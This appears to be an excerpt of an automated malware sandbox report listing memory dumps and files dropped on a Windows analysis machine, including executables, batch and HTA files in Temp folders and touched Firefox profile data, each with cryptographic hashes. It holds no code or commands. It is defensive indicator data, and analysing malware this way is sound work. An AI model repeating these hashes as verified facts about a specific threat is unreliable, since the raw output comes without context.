memory/4624-279-0x0000000005B00000-0x0000000005B1E000-memory.dmp

memory/4624-280-0x00000000060B0000-0x00000000060FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/4624-288-0x0000000007450000-0x0000000007ACA000-memory.dmp

memory/4624-289-0x0000000005FD0000-0x0000000005FEA000-memory.dmp

memory/4624-295-0x0000000006F40000-0x0000000006F62000-memory.dmp

memory/4624-294-0x0000000006FB0000-0x0000000007046000-memory.dmp

memory/4624-296-0x0000000008080000-0x0000000008624000-memory.dmp

memory/2668-304-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/3884-305-0x0000000000890000-0x0000000000D4D000-memory.dmp

memory/2256-309-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1940-308-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/3884-311-0x0000000000890000-0x0000000000D4D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/3632-322-0x0000000005780000-0x0000000005AD4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c35dc4c7d72daca6dcd32bc6331f4d07
SHA1 2812d9405a739c1deef84acd334106deebf5d984
SHA256 f02ca2450ce6d03a3d1c892ee44156c97f2639a52bdab0b1266e40c4501286df
SHA512 9e1d8cb2d24bcd5031440d10001ec6802b73a0de33cc90aa2a0635321c1b15e09df9da8edb0a0512bee3211f6bc7a0ac7d5e20d76d46ef3068aae73ecbae4d87

memory/1352-335-0x00000000056E0000-0x0000000005A34000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 090732d4386430f139c0be048baf7021
SHA1 f6398c7f97e5dfb88e6b144c0b2d0116a5ef1aef
SHA256 c55606da97d752119b80f4177d23165ae076d1fa1214ce370fea3150ddf7451c
SHA512 f6da6b29b7c19dbde8a6ea1161528d85b2121b0289aee21db98a45afb40cb60b6b0cc67951857764caa7d40b1ab774154b09a5fef7f2c95cc4f9c575b7a9b451

C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat

MD5 084bf17d056a073300b95ad12f3c16fb
SHA1 0880f27c25760c278d14801b3bab6195959cfeb2
SHA256 e22b98ea9512d8697c4464a9fc6569e59d1970848c575d58f89c66115776ea1f
SHA512 070409012e3581d04cd37f2715dd8b77bdc33b67c43d27513702797d2a1a6c6a2d153e1d44a6d35f00158a595174ca18362cc944e4b5e323935d5750f6b437c6

C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe

MD5 6afaf17077308fa040a656dc9e7d15ed
SHA1 df7caf0b424dc62a60dfb64f585c111448c0c1e3
SHA256 42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0
SHA512 cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986

memory/4596-356-0x00000000007F0000-0x00000000011FD000-memory.dmp

memory/1588-366-0x0000000005610000-0x0000000005964000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d884f8b34471f89b14b355abf5191604
SHA1 b641e7007a55b67cb4189bad0e007f66cdd9681d
SHA256 4657f02461f7433278adf673b34c577ea12c2d2e2902db7439c2e06132c32daa
SHA512 c9019688b4400ca43e77d95d107012766468d906b975ec931a0ef4f7e743857fe2c5658dd9134b6dd9a210eed2abcbddf3f893921e078f2e692ed84df55a3c83

memory/1588-368-0x0000000005C20000-0x0000000005C6C000-memory.dmp

C:\Temp\WK6TyvNYU.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/2084-378-0x0000000005880000-0x0000000005BD4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5b7315a71a6ac06ff592833fb879777c
SHA1 f8835919770e11ccaff7d8811d34890fcb2ca21c
SHA256 de18a55521656bd3c453a98e1a7b0e96e1d4e2c8fd0b3479e87a0d3f52149542
SHA512 765f8f788a29353ec5e3c4b3909d613d41d2d481f6bb8bb6ca97c7f9f09da366204c15389513c8bbffbda808a373410965b956cee17fc2d7898416c595fa7b97

memory/2084-387-0x0000000005F30000-0x0000000005F7C000-memory.dmp

memory/2668-388-0x0000000000E10000-0x00000000012CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/1584-406-0x0000000000D30000-0x0000000000DA8000-memory.dmp

memory/1588-410-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1588-408-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1940-411-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/2256-412-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4564-422-0x0000000000130000-0x00000000005ED000-memory.dmp

memory/4564-424-0x0000000000130000-0x00000000005ED000-memory.dmp

memory/4596-425-0x00000000007F0000-0x00000000011FD000-memory.dmp

memory/4596-426-0x00000000007F0000-0x00000000011FD000-memory.dmp

memory/1036-427-0x0000000000400000-0x000000000042F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

memory/1036-443-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2668-442-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/4372-444-0x0000000000780000-0x00000000013D1000-memory.dmp

memory/4596-446-0x00000000007F0000-0x00000000011FD000-memory.dmp

memory/2256-448-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1940-447-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1036-452-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe

MD5 42b3680c562365db56f1a9844fa6ae54
SHA1 4f5d87cf49ac317269a1cb531f915bd88db9ba02
SHA256 9866b2c8eba0053be9e89e4aa795033e30ee75e62639a55ef635fb6ebf23def3
SHA512 77a63d1f0e5ab942ce05ea608864623b09e9812231ff44945b9800a974c41b03e2a136c32279691ccb86e86b942d28c12ae7692a4c77224fc273617eb1c81c9c

memory/916-470-0x0000000000540000-0x00000000009FA000-memory.dmp

memory/652-473-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/652-476-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/1160-478-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4372-497-0x0000000000780000-0x00000000013D1000-memory.dmp

memory/2668-496-0x0000000000E10000-0x00000000012CD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZKC1FSM4\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/4372-517-0x0000000000780000-0x00000000013D1000-memory.dmp

memory/1940-518-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/2256-519-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4372-524-0x0000000000780000-0x00000000013D1000-memory.dmp

memory/1456-523-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1940-525-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

memory/1940-526-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe

MD5 7c169698effcdd45b7cbd763d28e87f5
SHA1 4f9db666d66255cd7ca2b0973ff00eae8b155f7a
SHA256 c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b
SHA512 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3

memory/916-539-0x0000000000540000-0x00000000009FA000-memory.dmp

memory/916-541-0x0000000000540000-0x00000000009FA000-memory.dmp

memory/3204-542-0x0000000000300000-0x0000000000613000-memory.dmp

memory/1160-544-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1160-552-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2668-555-0x0000000000E10000-0x00000000012CD000-memory.dmp

memory/3480-556-0x000001FEBE4F0000-0x000001FEBE50E000-memory.dmp

memory/3480-557-0x000001FEBE520000-0x000001FEBE55E000-memory.dmp

memory/3480-560-0x000001FED91F0000-0x000001FED92A2000-memory.dmp

memory/2256-565-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe

MD5 2012699a5e85cd283323c324aa061bc7
SHA1 69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f
SHA256 937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5
SHA512 729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683

memory/3780-578-0x0000000000580000-0x0000000000C17000-memory.dmp

memory/3780-594-0x0000000000580000-0x0000000000C17000-memory.dmp

memory/3204-600-0x0000000000300000-0x0000000000613000-memory.dmp

memory/3768-601-0x0000000000E00000-0x00000000012BD000-memory.dmp

memory/3768-604-0x0000000000E00000-0x00000000012BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe

MD5 e935a122d4c4e9c1b44368821a5154ff
SHA1 c93e4b9fb9563cb04a9cd39c75220eaf6007f98f
SHA256 161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4
SHA512 75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f

C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe

MD5 e787e8998f5306a754d625d7e29bbeb5
SHA1 14e056dbf0b3991664910ee3a1d23a4bb2c0253d
SHA256 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d
SHA512 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6

memory/464-658-0x00000000009D0000-0x0000000000E42000-memory.dmp

memory/464-668-0x00000000009D0000-0x0000000000E42000-memory.dmp

memory/464-665-0x00000000009D0000-0x0000000000E42000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\22c17877-1efc-4e5f-a64c-c5c18b1b4ff2

MD5 acec018a52105f93b4e2811d0e1acf28
SHA1 e703a7541bf403caf3963fd048159ae2f38b6803
SHA256 a04208b6ec80c2c961b2db2bd05b95a9f834500b0140fec50d298dac31d72f08
SHA512 24960c8591e1f67bd458ca3cac7dd734a0bb33268c5d4bbb8b4a1bfb0378fc7da746e43a64d6664f0d5c450d37ed3edd06523234a1110340e1e47dd8d2020f40

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\e8da15b7-baa7-4068-a86e-36255804da84

MD5 6042b785f9b8cc0259c6bd0ac2879ceb
SHA1 10aab68c03f3d15b29196d792368d23c059d54af
SHA256 b1f657f0281fb1897b9d8182f5734b09fec7ce3bbf0762af365ecd6b8cf6d483
SHA512 b51c764d926fafeaf1082537705b861304deea3db560c9bbc18909887a094e370d3a05494f7e27d6afe1abeb03d64b5282623132d1cb96353afdd4fc5f62a2d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\AlternateServices.bin

MD5 b6e64af78b542c87f8391499d8f60f62
SHA1 1becfcc3eee1358a7d86237db00244e837d0dd6b
SHA256 6653478cfab6dd59f315e6e53b5037bcfd2a4cf9c1cd1655e64a0873a3ba4221
SHA512 b7ecae9479363c18e6b84a46fb8bf29f6e3e3d3b20b1ece2d5d8f24618d77d80ae26cf8625e869639e37d7ac53c5e5952daa77da121fe0c64488edafbb2690d8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\54b2501c-c134-4c7a-98c4-c375cb200c11

MD5 ebaa74f2fe9b7c0aa2d6d5cec3d3509e
SHA1 bb9a3553589f63e2a8bc3daf91717208aa840d01
SHA256 e1521a200b12a09321236e54e0158a2d022641c0e28954eceee75d4866df132e
SHA512 c915cf6f2f02d90d10e20d67e41cbdb456e85ecc5ea861167a3d7339ed1b5b999f9ca7514ebddd61d547478928e5da4ade65a8c0d4a494818e78a8991b3ad002

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp

MD5 7cf617b51b2029061a8c6a1216c159e8
SHA1 7f1dea5ecf532b8c2a6888a56dced55a96e12846
SHA256 693ef7e861cd9159da536a4f611bce85f0943ace7cfb09bbad83960f83c5b42c
SHA512 7d61292e442c285a9275c4f060680c8773b2e80b2d8a652d687ba6b94d9ad4112283e18f0a5253e1bd4575199c4692d1f7ab96dca41bb8c823e9b18bfde52a11

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp

MD5 fb8e1a4f79179685b410ccc493feb488
SHA1 e8f9f0c60e734313c33c33e0026efe26ad0f9541
SHA256 9b203a6b9078008ad91ba0da1d6251241c9e5853e14c69319027315fb985cc33
SHA512 9440d04c875225683ae661b3a7bfabe893f6e05df537d00dda936fc72b930f1ae9dab9c7c553bb0d45fd7218d3e631c6881609c99979c2feb5b332f565c4a421

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs.js

MD5 30c18a82bccb56db9919143246de7b0b
SHA1 d2150c8306b6866c0a9a17f3ff0f453e68cbe70e
SHA256 9549fd7a9b82cc0915fec95b3f6197085e4bdf42c0496a61424e9f869ab6733d
SHA512 0a24359fd741bdd73aeb957e2b441b137d8bd385b413d0b0abdc8938340690820221326e09257bd5e49078cf88e3eb3cc258b8b4c01c650fffc61a6c3b213ac7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\AlternateServices.bin

MD5 f92ebacb935a2886788b25e597b1fb21
SHA1 e8cb46327daa2d85a5dea1515ec0375b65bcf19e
SHA256 f4fc6c5493db7dcc4db52897c19d5740e51c96b446f7ac3637d9d8d637a27d52
SHA512 6851bd17feda7785d5c35b825c3e5080354897053e58600b42f704836325a14569f47dde6968734b704d828fcef401a6b656e0da74aedab158bf076d55c13dc9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\outbhah2.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZKC1FSM4\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/464-1101-0x00000000009D0000-0x0000000000E42000-memory.dmp

memory/464-1104-0x00000000009D0000-0x0000000000E42000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp

MD5 afbeeff9e834a84f4d159a23dc75415c
SHA1 c115fa7e7e84a7cf52b874b68178f82a1d82113f
SHA256 1d38c3105238a12744049011dfdc47d2b4cb8d86c09775b3e22b528d9b44db2b
SHA512 a128b92e9ef605fb2d589d5936b55dcf797fd0e800a6a438ed9a5b1368a0638f0e63c372c0db89687aeaa052f3420314e0ad078906ef640a36527f0938e534a8

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

MD5 3c345db2fa2f45fea77744d2c67395b7
SHA1 3364aa7e099de25907cf64a9a05526876b2f456c
SHA256 f3ee964602d42a4a3fe43f466844ced7867da9435ce39b2d7f88ab31d424e8a6
SHA512 c593932afd38406bcbe8aa92bdeb378bdac8d974cf991cbe1aafe7e49f7a6a64150d3d4a2aacf3489bae028a17e6b38b3aab7a333fa792c3dfee26965ff72f50

memory/5424-1161-0x0000000000250000-0x000000000093E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs-1.js

MD5 205f5c11fd49f08ad0720a29fbfb418f
SHA1 71f626ae4a004e2a88a56709692fc1c43ca27a0e
SHA256 4e37aa62e92b5934f603eccd92dd86214689f890d4d894b966534aab805a4ae4
SHA512 c1c8ae38aae6302e0128dbbb2b1c02985a27ff58ac2f438df21af614436b8a014b8119266e21fe9fa1982131df97006fa4f1c1e7ab1ae3f42e162c2113397fc5